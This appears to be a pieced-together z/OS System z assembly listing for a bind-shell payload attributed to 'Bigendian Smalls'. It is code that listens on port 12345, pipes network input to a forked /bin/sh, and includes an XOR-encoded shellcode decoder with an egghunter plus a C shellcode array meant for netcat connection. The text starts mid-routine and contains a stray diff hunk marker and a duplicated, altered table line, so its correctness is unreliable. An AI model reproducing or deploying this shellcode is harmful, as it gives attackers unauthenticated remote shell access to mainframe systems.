CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
TITLE 'sb_shellcode.s x
Author: Bigendian Smalls'
ACONTROL AFPR
SBSHELL CSECT
SBSHELL AMODE 31
SBSHELL RMODE ANY
SYSSTATE ARCHLVL=2
ENTRY MAIN
MAIN DS 0F
** Begin setup and stack management **
STM 6,4,12(13) # store all the registers in old SP area
LARL 15,*-4 # put base addr into R15
LR 12,15 # put given base addr into R12
XR 1,1 # zeroout R1 for counting
XR 2,2 # zeroout R1 for counting
XR 3,3 # zeroout R3
AFI 1,X'01010102' # loading a 1 in R1
AFI 2,X'01010103' # loading a 1 in R1
XR 1,2 # loading a 1 in R1
LR 4,1 # will put a 4 in R4
SLA 4,1(1) # make R1 == 4
XR 10,10 # zeroout R10 for our egg
XR 2,2 # zero 2
LGFI 10,X'deadbeef' # load egghunter value into R10
LR 11,12 # load base int R11
LOOPER AR 11,1 # add 1 to R11
L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
CR 10,3 # compare egg with R11 mem pointer
BRC 7,LOOPER # branch anything but equal
AR 11,4
L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
CR 10,3 # compare egg with R11 mem pointer
BRC 7,LOOPER # 2nd check 2 in a row good to go!
AR 11,1 # 1 for the offset from above
SR 11,4 # 4 to skip last egg
ST 13,4(,11) # store old SP for later in wkg area
ST 11,8(,13) # store this in old wking area
LR 13,11 # set up R13 pt to new wkg area
** End setup and stack management **
** Begin main decoding routine **
LR 3,11 # This is now our egghunter loc
AR 3,4 # add 4 to 3
AR 3,4 # R3 points to SC for decoding
LR 5,3 # R5 points to SC for jumping to
SR 3,1 # R3-1 to we can XI that addr w/o nulls
SR 3,1 # R3-1 to we can XI that addr w/o nulls
LR 4,1 # R4 has static 1
XR 1,1 # R1 will be our byte counter
XR 2,2 # R2 will be address pointer
LOOP1 AR 1,4 # add 1 to R1 byte counter
ARK 2,3,1 # generate new address pointer
* put the XOR key (enc buffer char) from below in the quotes below
XI 1(2),X'4b' # xor byte with key
* put the buffer len (num of bytes) in the next cmd in CHI 1,<here>
CHI 1,2088 # to yield sc len
BRC 4,LOOP1 # loop bwd 18 bytes if R1 < size
XR 4,4
** Begin cleanup and stack management **
L 13,4(4,11) # reload old SP
LM 6,4,12(13) # restore registers
BCR 15,5 # jmp to sc
** End main decoding routine **
DC X'DEADBEEF' #egg
DC X'DEADBEEF' #egg + old sp
*******************************************************************
*Number of bytes: 2088
*Padding bytes: 0
*Enc buffer char: 0x4b
*ASM buffer:
DC X'dba79b478bbbb4b4b4b553448b0b4b4b48af1b9b0b4f539fecd34bX
4aec834b4fecae48708f144b4b48bd8f244b4b48beecae48788f144bX
4b48b98f244b4b48ba8fb64b4b489f8b5b4b4b4b5a533a1b3c4b4b51X
371b3b3b4b5137ee31cb4b1b3b3b4becbf4b424b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4ea48f66b4b4b4b2a76c4b'
DC X'fa4b350a6b4b428f164b4b4880532eecae49fe8f164b4b48f4532eX
ecae49e40a6b4b438f164b4b48f08b2a4b4b4b4becae49ee8f164b4bX
48fa8b2a4b4b4b4aecae49d68f164b4b48e28b2a4b4b4b49ecae49deX
0a6b4b428f164b4b48ea532eecae49c68f164b4b48d2532eecae49ccX
8fb64b4b48348b5b4b4b4b138b3b4b4b'
DC X'4b0e8f344b4b4b1951378f344b4b4b1b8b3b4b4b4b0a8f344b4b4bX
0751378f344b4b4b7551378f344b4b4b0d51378f344b4b4b7151378fX
344b4b4b0b8b3b4b4b481a8f344b4b4b778f344b4b4b708f344b4b4bX
718f344b4b4b728f344b4b4b738b3b4b4b4b7c8f344b4b4b7f51378fX
344b4b4b795137ee31cb4b8f344b4b4b'
DC X'65ec4e4b664b4b4b4b4b4c2ac9c2de2ae9c34b4b4b4b4a4b4b4b49X
4b4b4b4be9c34b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4ea4ec4e49a78bab4b4b4b400a6b4b428f164b4bX
4853532eecbf494feca14b5b8f164b4b'
DC X'4845532eecbf4ab78fb64b4b49bd8b5b4b4b4b7e8b3b4b4b49a18fX
344b4b4b648b3b4b4b49a98f344b4b4b608b3b4b4b49918f344b4b4bX
6c8b3b4b4b499d8f344b4b4b688b3b4b4b4b538f344b4b4b548b3b4bX
4b4b558f344b4b4b5051378f344b4b4b525137ee31cb4b8f344b4b4bX
5eec4e4b5f4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea4X
8fb64b4b49e48b5b4b4b4b618b3bb4b4b4ac8f344b4b4b6f8b3b4b4bX
4b548f344b4b4b6b8b3b4b4b49f88f344b4b4b578b3b4b4b4b508f34X
4b4b4b5351378f344b4b4b5d5137ee31cb4b8f344b4b4b59ec4e4b5aX
4b4b4b4b4b5b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea453b78f26b4b4b4b3a72c49X
1a4b358fb64b4b493b8b5b4b4b4b6a8b3bb4b4b4ed8f344b4b4b508bX
3b4b4b49138f344b4b4b5c8b3b4b4b4b5d8f344b4b4b5851378f344bX
4b4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4ea48fb64b'
DC X'4b49088b5b4b4b4b7d8b3bb4b4b43c8f344b4b4b7b8b3b4b4b4b62X
8f344b4b4b678b3b4b4b4b508f344b4b4b638b3b4b4b4b548f344b4bX
4b6f8b3b4b4b4b688f344b4b4b6b5137ee31cb4b8f344b4b4b57ec4eX
4b504b4b4b4b4b4b4b4b4b4b5b494b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4ea48bab4b4b4b470a6b4b4f8f16b4b4b4a7ecX
234b4cecbf4bbaeca14b598f164b4b4ab2ec234b4decbf4ba38b1bb4X
b4b4978b3b4b4b4b47ecae4b50ecae4a228b1b4b4b4aa5ecae4bc38bX
1b4b4b4aa88b3bb4b4b4a5ecae4b47ecae4ace8babb4b4b4bd8b1bb4X
b4b48becbf4b3d8fb64b4b4a82537c8f'
DC X'a44b4b4ae48b6b4b4b4b079c4c6b4b6b4b8b6b4b4b4b759c446b4bX
6b4b8f144b4b4b098b5b4b4b4b748b3b4b4b4b798f344b4b4b608b3bX
4b4b4b638f344b4b4b7e8b3b4b4b4ad98f344b4b4b7a8b3b4b4b4b55X
8f344b4b4b668b3b4b4b4b698f344b4b4b628b3b4b4b4b638f344b4bX
4b6e5137ee31cb4b8f344b4b4b6aec4e'
DC X'4b6b4b4b4b4b4b4b4b4b4b4b4b4a69696969696969696969696969X
6969694b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4ea48fa64b4b4a04533853b28f26b4b4b4a1a729abX
4b4bb5a7233b4bb4b5ec4e4a7a8fb64b4b4a1c8fa44b4b4a778b5b4bX
4b4b7a8b3bb4b4b4858f344b4b4b628b'
DC X'3b4b4b4b6d8f344b4b4b6c8f144b4b4b698b3b4b4b4a608f344b4bX
4b6b8b3bb4b4b48a8f344b4b4b5751378f344b4b4b5151378f344b4bX
4b535137ee31cb4b8f344b4b4b5fec4e4b584b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa6X
4b4b4bb28f26b4b4b4bd53bda7234ba9'
DC X'b4354cb58fb64b4b4a438fa44b4b4ba08b5b4b4b4b79533a503750X
3750378f144b4b4b6e8f344b4b4b638f644b4b4b6a51378f344b4b4bX
688f244b4b4b5751378f344b4b4b5551378f344b4b4b5751378f344bX
4b4b515137ee31cb4b8f344b4b4b5dec4e4b5e4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa64b4b4be28f36b4b4b4bdX
a7334bd8b4354cb58fb64b4b4bf08fa44b4b4bd78b5b4b4b4b50533aX
8f344b4b4b5c51378f344b4b4b5e51378f344b4b4b5851378f344b4bX
4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4ea48f26b4b4'
DC X'b4b2a7234b2bb4358f16b4b4b4a48f26b4b4b4a58fa64b4b4b2c4cX
b58b5bb4b4b5b08f06b4b4b44b8b6b4b4b4bccecc34b5ea87b5b4b4bX
3d8b704b4b4bb45273ec3f4b4dec234bceecbf4b45a81b6b4b4b3d8bX
104b4b4bb451625122527eec3fb4bc5022092b5b4b51525002ec3fb4X
a84cb58f06b4b4b5938b5bb4b4b586ec'
DC X'c34bce8b6b4b4b4b115062a87b5b4b4b3d8b704b4b4bb45273ec3fX
4b4dec734b2eecbf4b425168a87b6b4b4b3d8b704b4b4bb4097b5b4bX
51525002ec3fb4af4cb55cb48b0b4b4b4b5b1bbb0b4b139b0b4fd3a7X
9b478b0b4b4b4b4c13bb0b4b4cb54b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4a4b4b4b494a1878f74a1878ef'
DC X'4a187c5b4a187d7d4a187d234a187d6f4a1878554a1878c14a1879X
074a18784d4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b49497b724b4b4bX
4b'
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
@ -587,24 +161,170 @@ E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da'
DC X'9f'
E2A DC A(E2ABUF)
****************************************************
* ascii to ebcidic lookup *
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte *
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X
979899a2a3a4a5a6a7a8a9c04fd0a107'
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X
578c49cdcecbcfcce170dddedbdc8d8e'
DC X'df'
A2E DC A(A2EBUF)
BPXYSOCK LIST=YES # MACRO MAP for socket structure
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure
END @SETUP
******************************************************************
DC X'8BADF00D' eof marker
END
########################################################################
\* For SystemZ USS *\
\* Bind shell payload listens on port 12345 on 0.0.0.0 *\
\* Use netcat to connect *\
\* Author: Bigendian Smalls *\
char sc[]=
"\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22"
"\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12"
"\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef"
"\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4"
"\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0"
"\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53"
"\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23"
"\x97\x4b\x20\x01\xa7\x1e\x08\x28\xa7\x44\xff\xf9\x17\x44\x58\xd4"
"\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef"
"\xdb\xa7\x9b\x47\x8b\xbb\xb4\xb4\xb4\xb5\x53\x44\x8b\x0b\x4b\x4b"
"\x48\xaf\x1b\x9b\x0b\x4f\x53\x9f\xec\xd3\x4b\x4a\xec\x83\x4b\x4f"
"\xec\xae\x48\x70\x8f\x14\x4b\x4b\x48\xbd\x8f\x24\x4b\x4b\x48\xbe"
"\xec\xae\x48\x78\x8f\x14\x4b\x4b\x48\xb9\x8f\x24\x4b\x4b\x48\xba"
"\x8f\xb6\x4b\x4b\x48\x9f\x8b\x5b\x4b\x4b\x4b\x5a\x53\x3a\x1b\x3c"
"\x4b\x4b\x51\x37\x1b\x3b\x3b\x4b\x51\x37\xee\x31\xcb\x4b\x1b\x3b"
"\x3b\x4b\xec\xbf\x4b\x42\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x66\xb4\xb4\xb4\xb2\xa7\x6c\x4b\xfa"
"\x4b\x35\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x80\x53\x2e\xec\xae"
"\x49\xfe\x8f\x16\x4b\x4b\x48\xf4\x53\x2e\xec\xae\x49\xe4\x0a\x6b"
"\x4b\x43\x8f\x16\x4b\x4b\x48\xf0\x8b\x2a\x4b\x4b\x4b\x4b\xec\xae"
"\x49\xee\x8f\x16\x4b\x4b\x48\xfa\x8b\x2a\x4b\x4b\x4b\x4a\xec\xae"
"\x49\xd6\x8f\x16\x4b\x4b\x48\xe2\x8b\x2a\x4b\x4b\x4b\x49\xec\xae"
"\x49\xde\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\xea\x53\x2e\xec\xae"
"\x49\xc6\x8f\x16\x4b\x4b\x48\xd2\x53\x2e\xec\xae\x49\xcc\x8f\xb6"
"\x4b\x4b\x48\x34\x8b\x5b\x4b\x4b\x4b\x13\x8b\x3b\x4b\x4b\x4b\x0e"
"\x8f\x34\x4b\x4b\x4b\x19\x51\x37\x8f\x34\x4b\x4b\x4b\x1b\x8b\x3b"
"\x4b\x4b\x4b\x0a\x8f\x34\x4b\x4b\x4b\x07\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x75\x51\x37\x8f\x34\x4b\x4b\x4b\x0d\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x71\x51\x37\x8f\x34\x4b\x4b\x4b\x0b\x8b\x3b\x4b\x4b\x48\x1a"
"\x8f\x34\x4b\x4b\x4b\x77\x8f\x34\x4b\x4b\x4b\x70\x8f\x34\x4b\x4b"
"\x4b\x71\x8f\x34\x4b\x4b\x4b\x72\x8f\x34\x4b\x4b\x4b\x73\x8b\x3b"
"\x4b\x4b\x4b\x7c\x8f\x34\x4b\x4b\x4b\x7f\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x79\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x65\xec\x4e"
"\x4b\x66\x4b\x4b\x4b\x4b\x4b\x4c\x2a\xc9\xc2\xde\x2a\xe9\xc3\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4b\x4b\x4b\x4b\xe9\xc3\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\xec\x4e\x49\xa7\x8b\xab"
"\x4b\x4b\x4b\x40\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x53\x53\x2e"
"\xec\xbf\x49\x4f\xec\xa1\x4b\x5b\x8f\x16\x4b\x4b\x48\x45\x53\x2e"
"\xec\xbf\x4a\xb7\x8f\xb6\x4b\x4b\x49\xbd\x8b\x5b\x4b\x4b\x4b\x7e"
